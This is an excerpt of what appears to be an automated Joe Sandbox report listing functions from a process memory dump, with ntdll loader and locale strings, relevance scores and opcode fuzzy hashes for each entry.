                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                • API String ID: 0-1757540487
                                                                • Opcode ID: 8fc655b5b30e465f3ac3c891377078e089501a44921ab3615e14e67f53587aed
                                                                • Instruction ID: efbd6baf985b207ed79e8550858728c8fa3f447a4edc3c69d8e83403d277cd72
                                                                • Opcode Fuzzy Hash: 8fc655b5b30e465f3ac3c891377078e089501a44921ab3615e14e67f53587aed
                                                                • Instruction Fuzzy Hash: F351D3765087529BC710DFA4C454A7BB7E8BF88714F040A6EF989D7340E7B4DA04CBA6
                                                                Function 0560C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 056482E8
                                                                • Failed to reallocate the system dirs string !, xrefs: 056482D7
                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 056482DE
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-1783798831
                                                                • Opcode ID: 517a8736cdb5142e2f22261f45adb724a9eceab2fd5c01212ce9f14414e10692
                                                                • Instruction ID: d174cfacf0f70c2384e510143e8d21fec285323d677567e7ac299efc1c41b41f
                                                                • Opcode Fuzzy Hash: 517a8736cdb5142e2f22261f45adb724a9eceab2fd5c01212ce9f14414e10692
                                                                • Instruction Fuzzy Hash: EF411271664305EBD724EB64D849F7BBBE8FF84710F005A2AB945D3290EB70E800CB96
                                                                Function 0568C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • PreferredUILanguages, xrefs: 0568C212
                                                                • @, xrefs: 0568C1F1
                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0568C1C5
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                • API String ID: 0-2968386058
                                                                • Opcode ID: ad8153a383d1906c91d920bfe9848fd898fc1222cc91e2a929b767101a3405ce
                                                                • Instruction ID: 206feac4dcd5c42e7edbbc7aed86f6fed8ce0358927d0a16aac529a3009c2cf1
                                                                • Opcode Fuzzy Hash: ad8153a383d1906c91d920bfe9848fd898fc1222cc91e2a929b767101a3405ce
                                                                • Instruction Fuzzy Hash: A6417471A00219EBEF21EAD4C865FFEB7B9BB54704F14416AE505AB280D7749E44CB60
                                                                Function 05654755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05654888
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 05654899
                                                                • LdrpCheckRedirection, xrefs: 0565488F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                • API String ID: 0-3154609507
                                                                • Opcode ID: ff300888b215cb2d0c952bb05309cee24b3214413b3b236c6be5c9b5f68986fe
                                                                • Instruction ID: e6d1f0652c37789016d1c1329c28da87f39d8c2a3dd573dddb4a12401468c922
                                                                • Opcode Fuzzy Hash: ff300888b215cb2d0c952bb05309cee24b3214413b3b236c6be5c9b5f68986fe
                                                                • Instruction Fuzzy Hash: F641D132A946509FCF61CE68D844E267BE9FF49661F0505ADEC8997711DF30E880CB91
                                                                Function 05664144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                • API String ID: 0-1373925480
                                                                • Opcode ID: 65055380109540d1f1bece1e9858645fb225c545fde1af60b5cfde1a0f5deb41
                                                                • Instruction ID: 63471bb1c0cbff282060e1fed21aaa1aebb4045132ed5c5a4ac73d07c07b7f5b
                                                                • Opcode Fuzzy Hash: 65055380109540d1f1bece1e9858645fb225c545fde1af60b5cfde1a0f5deb41
                                                                • Instruction Fuzzy Hash: 1E410471A046588BEF25DB95C884BADBBB9FF85340F250459D902EBB81DF359941CB10
                                                                Function 056520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • LdrpInitializationFailure, xrefs: 056520FA
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 05652104
                                                                • Process initialization failed with status 0x%08lx, xrefs: 056520F3
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-2986994758
                                                                • Opcode ID: 9c9ea4f410d3c979cf6e0f381024ae7145144f4c4298a1ffa0e1c8391284a4b6
                                                                • Instruction ID: 9ae2cd3bca931bf00ec2dac879a95ef58bfb27af784e9bf07ebc639f6da77fc1
                                                                • Opcode Fuzzy Hash: 9c9ea4f410d3c979cf6e0f381024ae7145144f4c4298a1ffa0e1c8391284a4b6
                                                                • Instruction Fuzzy Hash: 4AF0C875B903087BE724E648DC5BFEA3B68FB44B64F140459FA016B781D9F0A940CA55
                                                                Function 055E03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: #%u
                                                                • API String ID: 48624451-232158463
                                                                • Opcode ID: d640842162f79b65ca76c10509b0c966d2fbfac37b7ea66f7c0c23991f0f26e4
                                                                • Instruction ID: a222e476841d787147d2d2a1948c91857fde48b292aa5eb96f869b55ee00bbdc
                                                                • Opcode Fuzzy Hash: d640842162f79b65ca76c10509b0c966d2fbfac37b7ea66f7c0c23991f0f26e4
                                                                • Instruction Fuzzy Hash: 6E717971A0020A9FCB05DFA8C989FAEB7F8FF48344F144069E905E7251EA34ED01CBA4
                                                                Function 0569A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `$`
                                                                • API String ID: 0-197956300
                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                • Instruction ID: e23f4d3fd16393272b56af8c94b036951e441be1bf483385365e56ae9c2519d3
                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                • Instruction Fuzzy Hash: DDC1D2312083429BDF28CF64C845B2BBBEABFC4718F084A2DF596CA690D774D545CB85
                                                                Function 05672F60 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • , xrefs: 056732B8
                                                                • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 05673011
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                • API String ID: 0-4088147954
                                                                • Opcode ID: 36dc07866d1777da9c0221165606800679d305a208c2a2c428117f5865d65cbf
                                                                • Instruction ID: fc2dc62adc73f2ba87cc60aef3284533a9659d933a6a35acb9346d1de193eacc
                                                                • Opcode Fuzzy Hash: 36dc07866d1777da9c0221165606800679d305a208c2a2c428117f5865d65cbf
                                                                • Instruction Fuzzy Hash: D5C1BD317083499BDB20CF25C884B2BBBE6BF88714F04491DF9969B340EB75D945DB92
                                                                Function 0564E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Legacy$UEFI
                                                                • API String ID: 2994545307-634100481
                                                                • Opcode ID: af4a001109fe172c0a3fb4667f36c14eda5ec03b4f3c267c175493d608ce4cf7
                                                                • Instruction ID: d9577dee5638439b91d4fc69a431e5287fd6ab1d0cb651c42ee1ae7e0d6276f0
                                                                • Opcode Fuzzy Hash: af4a001109fe172c0a3fb4667f36c14eda5ec03b4f3c267c175493d608ce4cf7
                                                                • Instruction Fuzzy Hash: 4A616B72E046089FDB24DFA8C844BAEBBB9FB48700F14402DE549EB251D732AD01CF55
                                                                Function 055DAC50 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • LdrpResGetMappingSize Exit, xrefs: 055DAC7C
                                                                • LdrpResGetMappingSize Enter, xrefs: 055DAC6A
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                • API String ID: 0-1497657909
                                                                • Opcode ID: cf65c1fdbfe8ee48241b24217cccbf4a070a604baeb8a51d8f70dfc617db6f84
                                                                • Instruction ID: cf1d1de5ce91f8639e342e1cb52493f7d27ac4da1fc578ab4df35a1a772ed910
                                                                • Opcode Fuzzy Hash: cf65c1fdbfe8ee48241b24217cccbf4a070a604baeb8a51d8f70dfc617db6f84
                                                                • Instruction Fuzzy Hash: 1361AE72B046499FEB21DFACC880BAEB7B6BF44751F084969E802AB790D774D940C760
                                                                Function 056743D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$MUI
                                                                • API String ID: 0-17815947
                                                                • Opcode ID: 6bf313c211ceca880f4efee8ac7847e1608ac9a2b935a25f282f1f4dff59da42
                                                                • Instruction ID: 679b769ea51059935582caee50806b6e05b6bb6a6163eea0089151742717f4cf
                                                                • Opcode Fuzzy Hash: 6bf313c211ceca880f4efee8ac7847e1608ac9a2b935a25f282f1f4dff59da42
                                                                • Instruction Fuzzy Hash: 395148B1E0021DAEEF11DFA5CC98EEEBBB9FB44754F140529E911B7280EA709D05CB64
                                                                Function 05604C59 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0$Flst
                                                                • API String ID: 0-758220159
                                                                • Opcode ID: 3ca880db92c70065ba7775ddf90f2f4568e2dfb66a2a210cb385207b0e93ee58
                                                                • Instruction ID: ad3294018cc27f2dd3ad5bda6c026d4e144311cc3a4248f8b4ae177de7654410
                                                                • Opcode Fuzzy Hash: 3ca880db92c70065ba7775ddf90f2f4568e2dfb66a2a210cb385207b0e93ee58
                                                                • Instruction Fuzzy Hash: 83518CB1E002588BCF29CF95C484A6AFBF5FF44315F54942ED1499B790EB70E986CB80
                                                                Function 055D04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • kLsE, xrefs: 055D0540
                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 055D063D
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                • API String ID: 0-2547482624
                                                                • Opcode ID: 55e978085ecb7fb096118740648fd12dba78861d070bb09832661bfe00cfe146
                                                                • Instruction ID: 2743a7e2affae234dd96a6caea381c7e501a3ed3d9528ba4c40a6875c2967f82
                                                                • Opcode Fuzzy Hash: 55e978085ecb7fb096118740648fd12dba78861d070bb09832661bfe00cfe146
                                                                • Instruction Fuzzy Hash: 2851AE726047428FC734EF29C448AA7FBE5BF84300F04483EE99A87290F7719545CBA6
                                                                Function 055DA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 055DA2FB
                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 055DA309
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                • API String ID: 0-2876891731
                                                                • Opcode ID: cf407202fb3011f654230e6229017d6630e9301c0da2c767c9f28942926f784f
                                                                • Instruction ID: dc4021e1b6dd102997ed1d5bc689c2d5aa753296dd9a49dd26c21e67435925a4
                                                                • Opcode Fuzzy Hash: cf407202fb3011f654230e6229017d6630e9301c0da2c767c9f28942926f784f
                                                                • Instruction Fuzzy Hash: 1E41D136A04649DBCB21CF59C854B6EB7B6FF85704F2444A9EC02DBB95E735D900CBA0
                                                                Function 05610FF6 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 05611025
                                                                • @, xrefs: 05611050
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                • API String ID: 0-2976085014
                                                                • Opcode ID: 489fefe15875428687585faf589db22bf143f25135df18f6d5d6813dca021ee9
                                                                • Instruction ID: 7fcffb6228661e0183627b4f5ad6f0deb6688e12abe78315ac4692a0e4b263fd
                                                                • Opcode Fuzzy Hash: 489fefe15875428687585faf589db22bf143f25135df18f6d5d6813dca021ee9
                                                                • Instruction Fuzzy Hash: EE31C472E00589ABCB12DBA5CC84FAFBBB9FBC5750F050465E901A7250DB34DD01CBA4
                                                                Function 0560A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Cleanup Group$Threadpool!
                                                                • API String ID: 2994545307-4008356553
                                                                • Opcode ID: b27b7daa6f91f9447f5b4eb08a7e09f54f0b76a7d919e52d3d9679d5efe4a6c3
                                                                • Instruction ID: ef0f54b0d8540ecf8f696cb4f8985eeb70ec6f2f2fec9c1ad298ba4f19ad2ffa
                                                                • Opcode Fuzzy Hash: b27b7daa6f91f9447f5b4eb08a7e09f54f0b76a7d919e52d3d9679d5efe4a6c3
                                                                • Instruction Fuzzy Hash: CF01DCB2264704AFD311DF68CD5AF2A7BF8EB44B55F008939B548CB190E774E884CB4A
                                                                Function 055DC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: MUI
                                                                • API String ID: 0-1339004836
                                                                • Opcode ID: 2bb545b03e1c9d96fbc14af7e7542829dd7153da3f2851f8194d8e99cf776b13
                                                                • Instruction ID: a7c20766c1b36d85278c25de755a8f532a017b6bac9245b32e194c51969bc687
                                                                • Opcode Fuzzy Hash: 2bb545b03e1c9d96fbc14af7e7542829dd7153da3f2851f8194d8e99cf776b13
                                                                • Instruction Fuzzy Hash: FF824B76E042599BDB34CFADC884BADF7B6BF48310F148169D85AAB350D770AD81CB60
                                                                Function 055D2FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PATH
                                                                • API String ID: 0-1036084923
                                                                • Opcode ID: 9a904ee9bca7aeadf97fe72efe5ca59680ce63ec43c20de88ed47808ebc64810
                                                                • Instruction ID: ab698a26f34ce25e13a0fa15678d20cd7e8f6b9af48477d1ee877231e438a613
                                                                • Opcode Fuzzy Hash: 9a904ee9bca7aeadf97fe72efe5ca59680ce63ec43c20de88ed47808ebc64810
                                                                • Instruction Fuzzy Hash: 53F1A472E10219DBCB25CF9DD981ABEFBB5FF48700F454829E841AB350DB349941CBA6
                                                                Function 0566CC20 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: w
                                                                • API String ID: 0-476252946
                                                                • Opcode ID: a1b6bb6790f2874c25a84c1750a0368db09e835a50beda6075f9bc1447324d35
                                                                • Instruction ID: 1651495b8ff710f52bd62b4ab2d05330890127a401eece7f7d51b0b8066c001a
                                                                • Opcode Fuzzy Hash: a1b6bb6790f2874c25a84c1750a0368db09e835a50beda6075f9bc1447324d35
                                                                • Instruction Fuzzy Hash: E6D1BF30A04656EBEB24CF55C441ABEFBB2FF44704F14C459E89A97641E335ED92C790
                                                                Function 05674C34 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                • Opcode ID: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                • Instruction ID: 3d2c13ef93f2625aa3019d01e93ccc87323b84c9a9e05b0359d7a6692be2fb94
                                                                • Opcode Fuzzy Hash: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                • Instruction Fuzzy Hash: CBA147B1A0120EAFDF15DFA8C884EBEB7B9FF48741F14402AE912A7750EB749941CB50
                                                                Function 05656420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: a194279836e1715ab407eb8e0ce046e1818f46a45452d91152d6b921975ed1a5
                                                                • Instruction ID: f6608900cc8a1a8c50211f36645ef05e3b8a13d31e99d004359b305c18248ca1
                                                                • Opcode Fuzzy Hash: a194279836e1715ab407eb8e0ce046e1818f46a45452d91152d6b921975ed1a5
                                                                • Instruction Fuzzy Hash: DD918272A40219AFEB21DF95CC85FAE77B8FF44760F500055FA01AB290D774AD04CBA4
                                                                Function 0567E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: f03ea305336baca9c32bf69fcf365433409ed771a055919674b7d67f7d387e1a
                                                                • Instruction ID: 2c9512459a96662f3a1632200e1d4ee24abcb6ced156d401f6b84f0ef7d942b0
                                                                • Opcode Fuzzy Hash: f03ea305336baca9c32bf69fcf365433409ed771a055919674b7d67f7d387e1a
                                                                • Instruction Fuzzy Hash: D291C271A00609BADB26EBA0DC48FAFBB7EFF85750F100069F515A7250DB769D05CB50
                                                                Function 0560A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: GlobalTags
                                                                • API String ID: 0-1106856819
                                                                • Opcode ID: 08e4853a012c7b246c2537aa0f1bce3688153aaa2eaecbf696d7d6c983d40e0f
                                                                • Instruction ID: 537c295b9ce546caa843580e51efabb21b0f0e54aa9fc0690ddfc79b102f4dcf
                                                                • Opcode Fuzzy Hash: 08e4853a012c7b246c2537aa0f1bce3688153aaa2eaecbf696d7d6c983d40e0f
                                                                • Instruction Fuzzy Hash: A2717B75E0421ADFDF28CF98D590AAEBBB2BF49750F14812AE806A7740E7319941CF60
                                                                Function 055EE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: EXT-
                                                                • API String ID: 0-1948896318
                                                                • Opcode ID: 9842a642910b53400f985dc71a2ff8f49cac9f20d2ba1ec5d46ce0308d906912
                                                                • Instruction ID: c2d28108c21d5ceaa5e096b3de8aa54e78a30e0119b7deb80edf853f9fd9380c
                                                                • Opcode Fuzzy Hash: 9842a642910b53400f985dc71a2ff8f49cac9f20d2ba1ec5d46ce0308d906912
                                                                • Instruction Fuzzy Hash: 0F41AE72618352ABD728DA74D845B6BB7ECBFC8704F040A2DF985E7180EA74D904C796
                                                                Function 055CCDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: AlternateCodePage
                                                                • API String ID: 0-3889302423
                                                                • Opcode ID: ee10d668e14e4f37258c7336ad2687a7fce0141d142572b4d02396ffb37d9699
                                                                • Instruction ID: 784fe01c9603f1080266835ab60b25559626e55c59f435b9708d51266c631bf9
                                                                • Opcode Fuzzy Hash: ee10d668e14e4f37258c7336ad2687a7fce0141d142572b4d02396ffb37d9699
                                                                • Instruction Fuzzy Hash: 9341D272E00618AADF24DB98C880ABFB7B8FF85310F14419EE916F3640D6B49A41CB50
                                                                Function 0564C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BinaryHash
                                                                • API String ID: 0-2202222882
                                                                • Opcode ID: 7b6a3ac782fe05eea0aac7071d1516438506c5c74b28f9d4fc1d2b458a662470
                                                                • Instruction ID: 29c82763acc7d5f03d8814e74c23bb9fef056b1701078f64361d0dfcc4fd716c
                                                                • Opcode Fuzzy Hash: 7b6a3ac782fe05eea0aac7071d1516438506c5c74b28f9d4fc1d2b458a662470
                                                                • Instruction Fuzzy Hash: AE4148B1D0152CAFEB61DA60CC94FEEB77DAB44714F0045E9EA08A7250DB709E49CF98
                                                                Function 0564CCA0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TrustedInstaller
                                                                • API String ID: 0-565535830
                                                                • Opcode ID: b03bb8d7e4592b5059864f8acb0ed3cced8ed1224123534cbfb6d7684c1002ab
                                                                • Instruction ID: f8fa554f12722dc43fb758f4a6d18bd4e7abdb8b706fc076620812efe3547745
                                                                • Opcode Fuzzy Hash: b03bb8d7e4592b5059864f8acb0ed3cced8ed1224123534cbfb6d7684c1002ab
                                                                • Instruction Fuzzy Hash: 3A316172A41619BFEB22EBE4CC45FEEBB79FB84750F050069FA01AB250D6719D41CB90
                                                                Function 05670F50 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
